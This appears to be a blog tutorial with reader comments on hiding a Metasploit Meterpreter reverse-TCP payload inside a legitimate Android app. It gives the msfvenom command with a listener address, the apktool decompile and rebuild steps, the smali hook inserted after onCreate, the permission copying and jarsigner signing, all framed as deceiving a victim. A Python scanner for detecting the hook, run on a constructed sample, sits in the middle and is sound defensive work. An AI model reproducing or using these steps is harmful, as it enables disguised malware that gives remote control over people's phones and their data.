How to Embed a Metasploit Payload into Main .apk File


Embed a Metasploit Payload into a Main Android apk File

Welcome back, guys. Today you will learn how to make a malicious Android .apk more convincing by injecting a hook to our Metasploit payload into a legitimate apk file.

Metasploit's flagship payload, Meterpreter, is a very powerful, all-purpose payload. Once it is installed on the victim's machine, we can do anything we want with that machine by sending commands to it; for example, we could grab sensitive data from the compromised device.


The Meterpreter payload also comes as an installable .apk file for Android systems. Excellent! Now we can use Metasploit to compromise Android phones as well. But if you have tried those payloads, you know that they do not look convincing. Nobody in their right mind installs and runs an app that apparently does nothing when it is opened. So how are we going to make the victim run the payload app on their smartphone?

One solution is to embed the payload inside another valid app. The app will look and behave exactly like the original one, so the victim won't even realise that their device is compromised. That is what we're going to do in this tutorial.

Injecting Metasploit Payloads into Android App

Let's start.

Download an original Android apk file; you can get one from:

https://apkpure.com/

Install the 32-bit compatibility libraries if you are running a 64-bit operating system:

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Now we need to generate our malicious payload.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > meterpreter.apk


If you don't know what your LHOST is, you can check it using ifconfig.

ifconfig


Now that we have our malicious payload, we need to download and install Apktool. If you are running Kali Linux, Apktool is already included in the OS and you can skip this step.

https://ibotpeaches.github.io/Apktool/install/

Now it's time to decompile our apk files. Open a new terminal and use the commands below to decompile both apk files into new directories.

(The d option tells apktool to decompile an apk file, -f replaces a previously decompiled apk's code, and -o sets the output directory for the decompiled files.)

apktool d -f -o /root/original /root/[Original_APK_Name]
apktool d -f -o /root/payload /root/meterpreter.apk


This decompiles the payload to the “/root/payload” directory and the original apk to the “/root/original” directory.


Now we need to copy the payload files into the original apk's folder. Go to the directory “/root/payload/smali/com/metasploit/stage” and copy all the payload .smali files there. Paste them into “/root/original/smali/com/metasploit/stage”; you will need to create the folders for /com/metasploit/stage.


Now we need to find out which activity runs when the app is launched. This information is stored in the AndroidManifest.xml file, so open AndroidManifest.xml from “/root/original” with your favorite text editor. It is an XML file, so it uses the familiar tags and attributes. Look for an <activity> tag that contains both of the lines below; you can use CTRL+F to search for them.

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

When you locate that activity, note the value of its “android:name” attribute. Example of the attribute's value:

“com.piriform.ccleaner.ui.activity.MainActivity”.


Now that we know the name of the activity, we can edit its smali file. Replace [Activity_Path] with the activity's “android:name”, but use slashes instead of the dots.


gedit /root/original/smali/[Activity_Path].smali

Now find the line below.

;->onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code on the line after it. This starts the payload alongside the original apk's code.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V


Now we need to inject the necessary permissions into our apk. A “permission” is a mechanism that restricts specific operations so that only a process granted that permission can perform them.

To edit the permissions, open /root/payload/AndroidManifest.xml and copy the payload's permissions into the original's manifest at /root/original/AndroidManifest.xml, then save the file. Make sure you don't have any duplicate permissions.
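From the defender's side, the two edits just described (the invoke-static hook after onCreate and the extra manifest permissions) are exactly what an analyst looks for in an apktool-decompiled app. The following scanner is an added example, not code from the tutorial; it runs over a constructed sample tree (an assumed com.example.app activity and a stub Payload.smali) that mimics the result of those edits.

```python
import re
import tempfile
from pathlib import Path
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
# The hook the tutorial pastes after onCreate(); any call into the stage class is a red flag.
HOOK_RE = re.compile(r"Lcom/metasploit/stage/Payload;->start\(")

def scan_decompiled_apk(root):
    """Collect injection indicators from an `apktool d` output directory."""
    root, smali = Path(root), Path(root) / "smali"
    findings = {"stage_package_present": (smali / "com/metasploit/stage").is_dir(),
                "hooked_lines": [], "permissions": []}  # (smali path, line no) / manifest perms
    for f in sorted(smali.rglob("*.smali")) if smali.is_dir() else []:
        for no, line in enumerate(f.read_text(encoding="utf-8").splitlines(), 1):
            if HOOK_RE.search(line):
                findings["hooked_lines"].append((f.relative_to(root).as_posix(), no))
    manifest = root / "AndroidManifest.xml"
    if manifest.is_file():
        perms = ET.parse(manifest).getroot().iter("uses-permission")
        findings["permissions"] = sorted(p.get(ANDROID_NS + "name", "") for p in perms)
    return findings

SAMPLE_FILES = {  # constructed sample tree mimicking the tutorial's edits (not a real app)
    "AndroidManifest.xml": """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application><activity android:name="com.example.app.MainActivity"/></application>
</manifest>""",
    "smali/com/metasploit/stage/Payload.smali": ".class public Lcom/metasploit/stage/Payload;\n",
    "smali/com/example/app/MainActivity.smali": """.class public Lcom/example/app/MainActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
    return-void
.end method""",
}

def build_sample(root):
    """Write the constructed sample under root so the scanner can be run offline."""
    for rel, text in SAMPLE_FILES.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(text, encoding="utf-8")
    return Path(root)

def scan_sample():
    with tempfile.TemporaryDirectory() as d:  # build, scan and clean up the sample
        return scan_decompiled_apk(build_sample(d))
```

Point scan_decompiled_apk at a real `apktool d` output directory to triage a suspicious apk; compare the permissions list against what the legitimate app is known to request.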


Now that the permissions are set, we can recompile our apk. Open a new terminal and use the following command to recompile:

apktool b /root/original

Replace /root/original with your apk's path.

Now that our apk is compiled, we need to sign it. This is very important, as an unsigned apk won't install. To sign our malicious apk file, replace [apk_path] with the path to your apk file.

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

If you are using an Android device, you can also use Zip Signer, a great tool for signing files, including zip and apk files.

You can download it from PlayStore by searching for Zip Signer.

Now the apk is complete.

I hope you enjoyed this tutorial.


24 COMMENTS

  1. You really make it seem so easy with your presentation, but I find
    this topic to be actually something that I think I would never understand.

    It seems too complicated and extremely broad for me. I am looking forward to your next post; I'll try to get the hang of it!

  2. Does your site have a contact page? I'm having trouble
    locating it, but I'd like to shoot you an e-mail.
    I’ve got some creative ideas for your blog you might be
    interested in hearing. Either way, great website and I look forward
    to seeing it grow over time.

  3. I’m truly enjoying the design and layout of your website.
    It's very easy on the eyes, which makes it much more enjoyable for me to
    come here and visit more often. Did you hire out a designer to
    create your theme? Great work!

  4. Just wish to say your article is amazing.
    The clarity in your post is simply cool and I could assume you're an expert on this subject.
    Fine, with your permission, allow me to grab your feed to keep updated with forthcoming posts.
    Thanks a million and please carry on the gratifying work.

  5. Greetings! I know this is kind of off topic but I was wondering which blog platform are you using for this site?

    I’m getting sick and tired of WordPress because I’ve had
    problems with hackers and I’m looking at alternatives for
    another platform. It would be fantastic if you could point me in the direction of a good platform.

  6. I am curious to find out what blog system you happen to be using.
    I'm having some small security issues with my latest site and I would like to find something safer.
    Do you have any solutions?

  7. Appreciating the time and energy you put into your website and detailed
    information you provide. It’s awesome to come across a blog every once in a
    while that isn’t the same old rehashed material. Wonderful read!

    I’ve saved your site and I’m adding your RSS feeds
    to my Google account.
